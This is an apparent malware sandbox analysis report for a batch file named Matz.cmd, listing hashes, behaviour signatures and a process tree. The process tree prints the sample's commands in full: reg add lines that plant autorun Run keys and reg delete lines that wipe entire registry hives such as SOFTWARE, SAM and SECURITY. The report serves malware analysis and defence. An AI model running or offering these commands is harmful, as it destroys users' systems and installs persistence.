Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    125s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14/09/2024, 22:20

General

  • Target

    Matz.cmd

  • Size

    22KB

  • MD5

    d221e50e4e2a071cf4507d22dfabc38d

  • SHA1

    ff1cd06eaacd102850441be310f8881ad6c8e8eb

  • SHA256

    055c572d74c93fe55c8da6506b845d594128511cc3fdd138e587acb76892cc22

  • SHA512

    d0491693bad8ddc0f90ed4a1de329ff32aabd3b492b89c657156ee02204347fee30d1f34babb39ab9ae732098561b7f89bb6e870e53deaf3326f16083777fb75

  • SSDEEP

    192:YflymM66lH6rGGGGGGGGGGGGGqVuxFtQBfVa5RNspblvNABmWdZU988fyGYgkNNs:OlM+

Malware Config

Signatures

  • Adds autorun key to be loaded by Explorer.exe on startup 2 TTPs 1 IoCs
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 24 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Manipulates Digital Signatures 1 TTPs 64 IoCs

    Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Modifies system executable filetype association 2 TTPs 46 IoCs
  • Adds Run key to start application 2 TTPs 14 IoCs
  • Installs/modifies Browser Helper Object 2 TTPs 4 IoCs

    BHOs are DLL modules which act as plugins for Internet Explorer.

  • System Binary Proxy Execution: Verclsid 1 TTPs 2 IoCs

    Adversaries may abuse Verclsid to proxy execution of malicious code.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 64 IoCs
  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious use of WriteProcessMemory 54 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Matz.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3660
    • C:\Windows\system32\msg.exe
      msg * TeamHKR
      2⤵
        PID:1204
      • C:\Windows\system32\reg.exe
        reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v samp-server.exe /d C:\Users\Admin\AppData\Local\Temp\Matz.cmd
        2⤵
        • Adds Run key to start application
        PID:1724
      • C:\Windows\system32\reg.exe
        reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v samp-server.bat /d C:\Users\Admin\AppData\Local\Temp\Matz.cmd
        2⤵
        • Adds Run key to start application
        PID:1512
      • C:\Windows\system32\reg.exe
        reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v MatzHKR.exe /d C:\Users\Admin\AppData\Local\Temp\Matz.cmd
        2⤵
        • Adds Run key to start application
        PID:5016
      • C:\Windows\system32\reg.exe
        reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v MatzHKR.bat /d C:\Users\Admin\AppData\Local\Temp\Matz.cmd
        2⤵
        • Adds Run key to start application
        PID:3916
      • C:\Windows\system32\reg.exe
        reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v virus.exe /d C:\Users\Admin\AppData\Local\Temp\Matz.cmd
        2⤵
        • Adds Run key to start application
        PID:4404
      • C:\Windows\system32\reg.exe
        reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v virus.bat /d C:\Users\Admin\AppData\Local\Temp\Matz.cmd
        2⤵
        • Adds Run key to start application
        PID:5036
      • C:\Windows\system32\reg.exe
        reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Winsoft.exe /d C:\Users\Admin\AppData\Local\Temp\Matz.cmd
        2⤵
        • Adds Run key to start application
        PID:2632
      • C:\Windows\system32\reg.exe
        reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Winsoft.bat /d C:\Users\Admin\AppData\Local\Temp\Matz.cmd
        2⤵
        • Adds Run key to start application
        PID:3704
      • C:\Windows\system32\reg.exe
        reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Serviceswin.exe /d C:\Users\Admin\AppData\Local\Temp\Matz.cmd
        2⤵
        • Adds Run key to start application
        PID:1140
      • C:\Windows\system32\reg.exe
        reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v serviceswin.bat /d C:\Users\Admin\AppData\Local\Temp\Matz.cmd
        2⤵
        • Adds Run key to start application
        PID:1948
      • C:\Windows\system32\reg.exe
        reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v *.bat /d C:\Users\Admin\AppData\Local\Temp\Matz.cmd
        2⤵
        • Adds Run key to start application
        PID:2832
      • C:\Windows\system32\reg.exe
        reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v *.exe /d C:\Users\Admin\AppData\Local\Temp\Matz.cmd
        2⤵
        • Adds Run key to start application
        PID:1856
      • C:\Windows\system32\reg.exe
        reg delete "HKEY_CURRENT_CONFIG\Software" /f
        2⤵
          PID:4748
        • C:\Windows\system32\reg.exe
          reg delete "HKEY_CURRENT_CONFIG\System" /f
          2⤵
            PID:1580
          • C:\Windows\system32\reg.exe
            reg delete "HKEY_USERS\.DEFAULT" /f
            2⤵
            • Manipulates Digital Signatures
            • Modifies data under HKEY_USERS
            PID:1620
          • C:\Windows\system32\reg.exe
            reg delete "HKEY_USERS\S-1-5-18" /f
            2⤵
              PID:3824
            • C:\Windows\system32\reg.exe
              reg delete "HKEY_USERS\S-1-5-19" /f
              2⤵
              • Modifies data under HKEY_USERS
              PID:2780
            • C:\Windows\system32\reg.exe
              reg delete "HKEY_USERS\S-1-5-19_Classes" /f
              2⤵
                PID:2620
              • C:\Windows\system32\reg.exe
                reg delete "HKEY_USERS\S-1-5-20" /f
                2⤵
                • Manipulates Digital Signatures
                • Modifies data under HKEY_USERS
                PID:4812
              • C:\Windows\system32\reg.exe
                reg delete "HKEY_USERS\S-1-5-20_Classes" /f
                2⤵
                  PID:2488
                • C:\Windows\system32\reg.exe
                  reg delete "HKEY_USERS\S-1-5-21-602162358-606747145-725345543-1003" /f
                  2⤵
                    PID:3140
                  • C:\Windows\system32\reg.exe
                    reg delete "HKEY_USERS\S-1-5-21-602162358-606747145-725345543-1003_Classes" /f
                    2⤵
                      PID:892
                    • C:\Windows\system32\reg.exe
                      reg delete "HKEY_LOCAL_MACHINE\HARDWARE" /f
                      2⤵
                      • Checks processor information in registry
                      • Enumerates system info in registry
                      PID:1176
                    • C:\Windows\system32\reg.exe
                      reg delete "HKEY_LOCAL_MACHINE\SAM" /f
                      2⤵
                        PID:2724
                      • C:\Windows\system32\reg.exe
                        reg delete "HKEY_LOCAL_MACHINE\SECURITY" /f
                        2⤵
                          PID:1624
                        • C:\Windows\system32\reg.exe
                          reg delete "HKEY_LOCAL_MACHINE\SOFTWARE" /f
                          2⤵
                          • Adds autorun key to be loaded by Explorer.exe on startup
                          • Boot or Logon Autostart Execution: Active Setup
                          • Manipulates Digital Signatures
                          • Modifies system executable filetype association
                          • Adds Run key to start application
                          • Installs/modifies Browser Helper Object
                          • Event Triggered Execution: Netsh Helper DLL
                          • Modifies Internet Explorer settings
                          • Modifies registry class
                          PID:4888
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3840,i,11391966286255097843,10588851088187498028,262144 --variations-seed-version --mojo-platform-channel-handle=4352 /prefetch:8
                        1⤵
                          PID:1272
                        • C:\Windows\system32\verclsid.exe
                          "C:\Windows\system32\verclsid.exe" /S /C {1685D4AB-A51B-4AF1-A4E5-CEE87002431D} /I {0C733A8A-2A1C-11CE-ADE5-00AA0044773D} /X 0x401
                          1⤵
                          • System Binary Proxy Execution: Verclsid
                          PID:5016
                        • C:\Windows\system32\verclsid.exe
                          "C:\Windows\system32\verclsid.exe" /S /C {1685D4AB-A51B-4AF1-A4E5-CEE87002431D} /I {0C733A8A-2A1C-11CE-ADE5-00AA0044773D} /X 0x401
                          1⤵
                          • System Binary Proxy Execution: Verclsid
                          PID:1956
                        • C:\Windows\system32\CompMgmtLauncher.exe
                          "C:\Windows\system32\CompMgmtLauncher.exe"
                          1⤵
                            PID:5016
                          • C:\Windows\system32\CompMgmtLauncher.exe
                            "C:\Windows\system32\CompMgmtLauncher.exe"
                            1⤵
                              PID:632

                            Network

                            MITRE ATT&CK Enterprise v15

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads